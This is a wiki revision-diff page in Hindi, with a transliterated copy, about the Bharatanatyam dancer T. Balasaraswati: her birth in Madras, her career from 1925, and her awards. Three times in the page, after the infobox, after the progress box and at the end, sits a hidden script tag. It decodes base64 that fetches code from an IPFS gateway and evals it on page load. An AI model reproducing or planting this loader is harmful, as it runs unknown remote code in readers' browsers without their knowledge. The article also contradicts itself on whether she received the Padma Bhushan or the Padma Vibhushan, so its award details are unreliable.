Difference between revisions of "टी. बालासरस्वती"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:T.Balasaraswati.jpg|thumb|250px|टी. बाला सरस्वती]]
+
{{सूचना बक्सा कलाकार
'''टी. बाला सरस्वती''' (जन्म- [[13 मई]], [[1918]], [[तमिलनाडु]]; मृत्यु- [[9 फरवरी]], [[1984]]) [[भरतनाट्यम]] की सुप्रसिद्ध नृत्यांगना थीं। उन्हें '[[संगीत नाटक अकादमी पुरस्कार]]', '[[पद्मभूषण]]' और 'मानद विद्या वाचस्पति' आदि अलंकारणों से सम्मानित किया गया था। टी. बाला सरस्वती [[तमिलनाडु]] राज्य से सम्बन्धित थीं।
+
|चित्र=T.Balasaraswati.jpg
 +
|चित्र का नाम=टी. बाला सरस्वती
 +
|पूरा नाम=तंजोर बाला सरस्वती
 +
|प्रसिद्ध नाम=टी. बालासरस्वती
 +
|अन्य नाम=
 +
|जन्म= [[13 मई]], [[1918]]
 +
|जन्म भूमि= [[चेन्नई]] (भूतपूर्व [[मद्रास]]), [[तमिलानडु]] 
 +
|मृत्यु=[[9 फरवरी]], [[1984]]
 +
|मृत्यु स्थान=मद्रास, तमिलानडु
 +
|अविभावक=
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=नृत्यांगना
 +
|मुख्य रचनाएँ=
 +
|मुख्य फ़िल्में=
 +
|विषय=
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि='[[संगीत नाटक अकादमी पुरस्कार]]', '[[पद्मभूषण]]' और 'मानद विद्या वाचस्पति'
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी= वह [[दक्षिण भारत]] के बाहर ''[[भरतनाट्यम नृत्य]]'' प्रस्तुत करने वाली पहली कलाकार थीं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''टी. बाला सरस्वती''' (जन्म: [[13 मई]], [[1918]] - मृत्यु: [[9 फरवरी]], [[1984]]) [[भरतनाट्यम]] की सुप्रसिद्ध नृत्यांगना थीं। उन्हें '[[संगीत नाटक अकादमी पुरस्कार]]', '[[पद्मभूषण]]' और 'मानद विद्या वाचस्पति' आदि अलंकारणों से सम्मानित किया गया था। टी. बाला सरस्वती [[तमिलनाडु]] राज्य से सम्बन्धित थीं।
 
==जन्म==
 
==जन्म==
टी. बाला सरस्वती का जन्म 13 मई, 1918 को तमिलानडु के [[चेन्नई]] (भूतपूर्व मद्रास) शहर में हुआ था।  
+
टी. बाला सरस्वती का जन्म 13 मई, 1918 को [[तमिलानडु]] के [[चेन्नई]] (भूतपूर्व [[मद्रास]]) शहर में हुआ था।  
 
====कैरियर====
 
====कैरियर====
 
एक नर्तकी के रूप में टी. बाला सरस्वती ने अपने कैरियर की शुरुआत [[1925]] में की थी। वह [[दक्षिण भारत]] के बाहर ''[[भरतनाट्यम नृत्य]]'' प्रस्तुत करने वाली पहली कलाकार थीं। उन्होंने पहली बार सन [[1934]] में [[कोलकाता]] में अपनी [[नृत्य कला]] को प्रस्तुत किया था।
 
एक नर्तकी के रूप में टी. बाला सरस्वती ने अपने कैरियर की शुरुआत [[1925]] में की थी। वह [[दक्षिण भारत]] के बाहर ''[[भरतनाट्यम नृत्य]]'' प्रस्तुत करने वाली पहली कलाकार थीं। उन्होंने पहली बार सन [[1934]] में [[कोलकाता]] में अपनी [[नृत्य कला]] को प्रस्तुत किया था।
 
 
==सम्मान और पुरस्कार==
 
==सम्मान और पुरस्कार==
 
टी. बाला सरस्वती को सन [[1955]] में '[[संगीत नाटक अकादमी|संगीत नाटक अकादमी पुरस्कार]]', सन [[1973]] में 'मद्रास संगीत अकादमी' से 'कलानिधि पुरस्कार' और [[1977]] में '[[पद्म विभूषण]]' से सम्मानित किया था।
 
टी. बाला सरस्वती को सन [[1955]] में '[[संगीत नाटक अकादमी|संगीत नाटक अकादमी पुरस्कार]]', सन [[1973]] में 'मद्रास संगीत अकादमी' से 'कलानिधि पुरस्कार' और [[1977]] में '[[पद्म विभूषण]]' से सम्मानित किया था।
 
====निधन====
 
====निधन====
 
'भरतनाट्यम' की प्रसिद्ध नृत्यांगना टी. बाला सरस्वती का निधन [[9 फ़रवरी]], [[1984]] को हुआ।
 
'भरतनाट्यम' की प्रसिद्ध नृत्यांगना टी. बाला सरस्वती का निधन [[9 फ़रवरी]], [[1984]] को हुआ।
 +
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 12:10, 6 February 2013

ti. balasarasvati
poora nam tanjor bala sarasvati
prasiddh nam ti. balasarasvati
janm 13 mee, 1918
janm bhoomi chennee (bhootapoorv madras), tamilanadu
mrityu 9 pharavari, 1984
mrityu sthan madras, tamilanadu
karm-kshetr nrityaangana
puraskar-upadhi 'sangit natak akadami puraskar', 'padmabhooshan' aur 'manad vidya vachaspati'
nagarikata bharatiy
any janakari vah dakshin bharat ke bahar bharatanatyam nrity prastut karane vali pahali kalakar thian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ti. bala sarasvati (janm: 13 mee, 1918 - mrityu: 9 pharavari, 1984) bharatanatyam ki suprasiddh nrityaangana thian. unhean 'sangit natak akadami puraskar', 'padmabhooshan' aur 'manad vidya vachaspati' adi alankaranoan se sammanit kiya gaya tha. ti. bala sarasvati tamilanadu rajy se sambandhit thian.

janm

ti. bala sarasvati ka janm 13 mee, 1918 ko tamilanadu ke chennee (bhootapoorv madras) shahar mean hua tha.

kairiyar

ek nartaki ke roop mean ti. bala sarasvati ne apane kairiyar ki shuruat 1925 mean ki thi. vah dakshin bharat ke bahar bharatanatyam nrity prastut karane vali pahali kalakar thian. unhoanne pahali bar san 1934 mean kolakata mean apani nrity kala ko prastut kiya tha.

samman aur puraskar

ti. bala sarasvati ko san 1955 mean 'sangit natak akadami puraskar', san 1973 mean 'madras sangit akadami' se 'kalanidhi puraskar' aur 1977 mean 'padm vibhooshan' se sammanit kiya tha.

nidhan

'bharatanatyam' ki prasiddh nrityaangana ti. bala sarasvati ka nidhan 9 faravari, 1984 ko hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>